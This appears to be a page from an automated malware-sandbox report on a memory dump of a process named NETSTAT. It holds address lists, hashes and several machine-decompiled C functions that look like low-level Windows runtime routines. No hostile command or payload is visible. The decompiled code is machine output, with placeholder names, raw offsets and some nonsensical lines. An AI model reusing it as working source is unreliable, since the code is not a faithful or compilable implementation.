0x02efba2a
0x02efba2b
0x02efba2e
0x02efba30
0x02efba37
0x02efba3f
0x02efba9c
0x02efbaa2
0x02efbb13
0x02efbb15
0x02efbaae
0x02efbaae
0x02efbab3
0x02efbab5
0x02efbaba
0x02efbac8
0x02efbac8
0x02efbaba
0x02efbacd
0x02efbacf
0x00000000
0x02efbacf
0x02efbb1a
0x00000000
0x02efbb1c
0x02efbaa7
0x02efbb11
0x00000000
0x02efbb11
0x02efbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x02efba41
0x02efba41
0x02efba41
0x02efba58
0x02efba5d
0x02efba62
0x00000000
0x00000000
0x02efba64
0x02efba67
0x02efba68
0x02efba69
0x02efba6c
0x02efba6f
0x02efba71
0x02efba78
0x02efba80
0x00000000
0x00000000
0x02efba90
0x02efba90
0x02efba97
0x00000000
0x02efba97
0x02efb9f5
0x02efb9f7
0x02efb9f7
0x02efb9fa
0x02efba03
0x02efba07
0x02efba0c
0x02efba10
0x02efba17
0x00000000
0x02efb9f7
0x02efb9a6
0x02efb9a8
0x02efb9af
0x02efb9b3
0x00000000
0x00000000
0x02efb9b9
0x00000000
0x02efb9b9
0x02efb94d
0x02efb98f
0x02efb995
0x02efb999
0x02efb960
0x02efb967
0x02efb968
0x02efb96a
0x00000000
0x02efb96a
0x02efb99b
0x02efb99e
0x00000000
0x00000000
0x00000000
0x02efb99e
0x02efb951
0x02efb954
0x02efb95a
0x02efb95e
0x02efb972
0x02efb979
0x02efb97d
0x02efb97f
0x02efb980
0x02efb982
0x02efb984
0x00000000
0x02efb984
0x00000000
0x02efb926
0x00000000
0x02efb926

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d0f6ad65f3027255d72245c31e79351d1150d564a82f63f244d7ce7017c3d5
Instruction ID: 5f9ac68808a06d2c3274540cb685ee9d3fb2bc477bb90c6dac7335191ef57aca
Opcode Fuzzy Hash: 29d0f6ad65f3027255d72245c31e79351d1150d564a82f63f244d7ce7017c3d5
Instruction Fuzzy Hash: 9371F132280B01AFDB71DF14C855F56B7E6EB48728F14D52CEB598B6A0EB71E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EE6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E02EE6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E02EE6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E02E87D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E02EA9AE0();
					_t87 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E02EE795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E02EE795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E02EE795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E02EE795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L02E84620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E02EE6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E02EE6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E02EE6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E02EE6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E02E87D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E02EA9AE0();
								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L02E82400( &_v36);
							if(_v24 >= 0) {
								_t87 = L02E82400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L02E82400( &_v52);
							}
							if(_v28 >= 0) {
								return L02E82400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x02ee6dd4
0x02ee6dde
0x02ee6de1
0x02ee6de3
0x02ee6de6
0x02ee6de9
0x02ee6dec
0x02ee6def
0x02ee6df2
0x02ee6df5
0x02ee6dfe
0x02ee6e04
0x02ee6e09
0x02ee6e0d
0x02ee6e18
0x02ee6e1b
0x02ee6e22
0x02ee6e2d
0x02ee6e30
0x02ee6e36
0x02ee6e42
0x02ee6e4d
0x02ee6e50
0x02ee6e55
0x02ee6e5c
0x02ee6e6e
0x02ee6e5e
0x02ee6e67
0x02ee6e67
0x02ee6e73
0x02ee6e74
0x02ee6e77
0x02ee6e7c
0x02ee6e7d
0x02ee6e8e
0x02ee6e93
0x02ee6e9c
0x02ee6ea8
0x02ee6eab
0x02ee6eac
0x02ee6eb3
0x02ee6ecd
0x02ee6edc
0x02ee6ee2
0x02ee6ee5
0x02ee6ef2
0x02ee6efb
0x02ee6f01
0x02ee6f06
0x02ee6f0b
0x02ee6f11
0x02ee6f1a
0x02ee6f22
0x02ee6f26
0x02ee6f26
0x02ee6f33
0x02ee6f41
0x02ee6f44
0x02ee6f47
0x02ee6f54
0x02ee6f65
0x02ee6f77
0x02ee6f7c
0x02ee6f82
0x02ee6f91
0x02ee6f99
0x02ee6fa3
0x02ee6fae
0x02ee6fae
0x02ee6fba
0x02ee6fbb
0x02ee6fbc
0x02ee6fc1
0x02ee6fc2
0x02ee6fd3
0x02ee6fd8
0x02ee6fd8
0x02ee6fdf
0x02ee6fe8
0x02ee6fee
0x02ee6fee
0x02ee6ff5
0x02ee6ffb
0x02ee6ffb
0x02ee7004
0x00000000
0x02ee700a
0x02ee7004
0x02ee6eb3
0x02ee6e9c
0x02ee7015

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: b908424d3d6643707d781534991491e563f26921c762450d4e30a1490ca606fb
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: FE715071A40619EFCF10DFA5C944AEEFBBAFF48714F109469E509A7250D734AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E652A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02E652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E02E7EEF0(0x2f579a0);
					_t104 =  *0x2f58210; // 0x3f2bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E02E7EB70(_t93, 0x2f579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E02EA9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E02E7EEF0(0x2f579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E02E7EB70(0, 0x2f579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x3f2bc802
								_t13 = _t104 + 0xc; // 0x3f2bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E02E9F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E02E7EEF0(0x2f579a0);
									__eflags =  *0x2f58210 - _t104; // 0x3f2bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x2f58210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x20003f2b
											_t95 =  *((intOrPtr*)( *_t37));
											E02EE4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E02E7EB70(_t95, 0x2f579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E02EA95D0();
											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E02EA95D0();
											L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E02E7EB70(_t93, 0x2f579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E02EA95D0();
										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E02EA95D0();
										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x20003f2b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x3f2bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E02E9F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x02e652a5
0x02e652ad
0x02e652b0
0x02e652b3
0x02e652b7
0x02e652ba
0x02e652bf
0x02e652c4
0x02e652cc
0x00000000
0x00000000
0x02e652ce
0x02e652d1
0x02e652d9
0x02e652dd
0x02e652e7
0x02e652f7
0x02e652f9
0x02e652fd
0x02ec0dcf
0x02ec0dd5
0x02ec0dd6
0x02ec0dd7
0x02ec0dd8
0x02ec0dd9
0x02ec0dde
0x02ec0ddf
0x02ec0de0
0x02ec0de1
0x02ec0de2
0x02ec0de2
0x02ec0de5
0x02ec0dea
0x02ec0dec
0x02ec0f60
0x02ec0f64
0x02ec0f70
0x02ec0f76
0x02ec0f79
0x02ec0f79
0x00000000
0x02ec0f64
0x02ec0df2
0x02ec0df7
0x02ec0e04
0x02ec0e04
0x02ec0e0d
0x02ec0e0d
0x02ec0e10
0x02ec0e1a
0x02ec0e1c
0x02ec0e4c
0x02ec0e52
0x02ec0e61
0x02ec0e67
0x02ec0e6b
0x02ec0e70
0x02ec0e76
0x02ec0ed7
0x02ec0edc
0x02ec0ee0
0x02ec0ee6
0x02ec0eea
0x02ec0eed
0x02ec0ef0
0x02ec0ef3
0x02ec0ef6
0x02ec0ef9
0x02ec0efb
0x02ec0efe
0x02ec0f01
0x02ec0f01
0x02ec0f0b
0x02ec0f12
0x02ec0f16
0x02ec0f18
0x02ec0f18
0x02ec0f1b
0x02ec0f2c
0x02ec0f31
0x02ec0f31
0x02ec0f35
0x02ec0f39
0x02ec0f3a
0x02ec0f3c
0x02ec0f3c
0x02ec0f3f
0x02ec0f50
0x02ec0f55
0x02ec0f55
0x02ec0f59
0x02e652eb
0x02e652f1
0x02e652f1
0x02ec0e7d
0x02ec0e84
0x02ec0e88
0x02ec0e8a
0x02ec0e8a
0x02ec0e8d
0x02ec0e9e
0x02ec0ea3
0x02ec0ea3
0x02ec0ea7
0x02ec0eaf
0x02ec0eb3
0x02ec0eb9
0x02ec0eb9
0x02ec0ebc
0x02ec0ecd
0x02ec0ecd
0x00000000
0x02ec0eb3
0x02ec0e1e
0x02ec0e21
0x02ec0e25
0x02ec0e2b
0x02ec0e2f
0x02ec0e30
0x02ec0e3a
0x02ec0e3f
0x02ec0e41
0x00000000
0x00000000
0x02ec0e47
0x00000000
0x02ec0e47
0x02ec0df9
0x02ec0dfe
0x00000000
0x00000000
0x00000000
0x02ec0dfe
0x02e65303
0x02e65307
0x00000000
0x02e65309
0x00000000
0x02e65309
0x02e65307
0x02e652e9
0x02e652e9
0x00000000
0x02e652e9
0x02e6530e
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d62d75912755cc1bd585fc2ea48903decf1881795c9ea2efef34d7a744d2a85
Instruction ID: cb940c5646c3c2de24493b89aeebc40e2ee6a3423b459f458db3d1f4e05d97d4
Opcode Fuzzy Hash: 6d62d75912755cc1bd585fc2ea48903decf1881795c9ea2efef34d7a744d2a85
Instruction Fuzzy Hash: 8551EC702C4341ABD720EF64C944B27BBE5FF44758F24981EF9A987651E770E840CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E92AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E92AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x2f58204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x2f58208; // 0x2f58207
				_t8 = _t57 + 0x2f58208; // 0x2f58207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x2f58450; // 0x3f10f2
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x2f5821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x2f56d5c; // 0x7fc80654
							_t72 =  *0x2f56d5c; // 0x7fc80654
							_t75 =  *0x2f56d5c; // 0x7fc80654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x2f56d5c; // 0x7fc80654
							_t84 =  *0x2f56d5c; // 0x7fc80654
							_t87 =  *0x2f56d5c; // 0x7fc80654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E02EAF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x02e92ae4
0x02e92aec
0x02e92aef
0x02e92af4
0x02e92af7
0x02e92afd
0x02e92b92
0x02e92b92
0x02e92b97
0x02e92b9c
0x02e92b9c
0x02e92b03
0x02e92b06
0x02e92b09
0x02e92b09
0x02e92b0f
0x02e92b15
0x02e92b15
0x02e92b1b
0x02e92b1e
0x02e92b21
0x02e92b26
0x02e92b29
0x02e92b81
0x02e92b84
0x02e92c0e
0x02e92c15
0x02e92c24
0x02e92c24
0x02e92b8a
0x02e92b8a
0x02e92b8a
0x02e92b8a
0x02e92b90
0x00000000
0x00000000
0x00000000
0x00000000
0x02e92b4a
0x02e92b4a
0x02e92b4d
0x02e92b53
0x00000000
0x00000000
0x02e92b55
0x02e92b58
0x02e92bb7
0x02ed5d1b
0x02ed5d37
0x02ed5d47
0x02ed5d53
0x02e92bbd
0x02e92bbd
0x02e92bbd
0x02e92bb7
0x02e92b5d
0x02e92c2f
0x02ed5d5b
0x02ed5d77
0x02ed5d87
0x02ed5d93
0x02e92c35
0x02e92c35
0x02e92c35
0x02e92c2f
0x02e92b65
0x02e92b9f
0x02e92ba2
0x02e92b67
0x02e92b67
0x02e92b69
0x02e92b6b
0x02e92b6e
0x02e92bc9
0x02e92bcc
0x02e92bcf
0x02e92bd4
0x02e92bd6
0x02e92bd6
0x02e92bdb
0x02e92c02
0x02e92c05
0x02e92c07
0x00000000
0x02e92c07
0x02e92be0
0x02e92c00
0x02e92c3f
0x02e92c3f
0x00000000
0x02e92c00
0x02e92be5
0x02e92be7
0x02e92bec
0x02e92bf4
0x02e92bf6
0x00000000
0x02e92bf6
0x02e92b70
0x02e92b76
0x02e92b2b
0x02e92b2b
0x02e92b2d
0x02e92b2f
0x02e92b32
0x02e92b35
0x02e92b3a
0x00000000
0x02e92b40
0x02e92b43
0x02e92b45
0x02e92b47
0x02e92b4a
0x02e92b4d
0x02e92b53
0x00000000
0x00000000
0x00000000
0x02e92b53
0x02e92b78
0x02e92b78
0x02e92b7b
0x02e92b7e
0x00000000
0x02e92b7e
0x02e92b76
0x02e92ba5
0x02e92ba5
0x02e92ba8
0x02e92bad
0x00000000
0x00000000
0x02e92baf
0x02e92baf
0x02e92bc2
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d065f5e4bd16f523660e9081c8d7430bcc1509d60a05630fd41d01a1c62e47d
Instruction ID: 7c6d4d8c5fed78b58c46d1ef415524b807b4d6ee0b77c04461f2382848421be5
Opcode Fuzzy Hash: 9d065f5e4bd16f523660e9081c8d7430bcc1509d60a05630fd41d01a1c62e47d
Instruction Fuzzy Hash: 8651AF76A405299BCF14CF2DC8A09BDB7F1BB88704715D85AEE569B310E730AE51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02F2AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E02F2C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E02F2ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E02F2FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E02F2EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E02E87D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E02F21608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E02F31536(0x2f58ae4, (_t74 -  *0x2f58b04 >> 0x14) + (_t74 -  *0x2f58b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L02F2C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E02F2A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E02F0CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E02F2ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
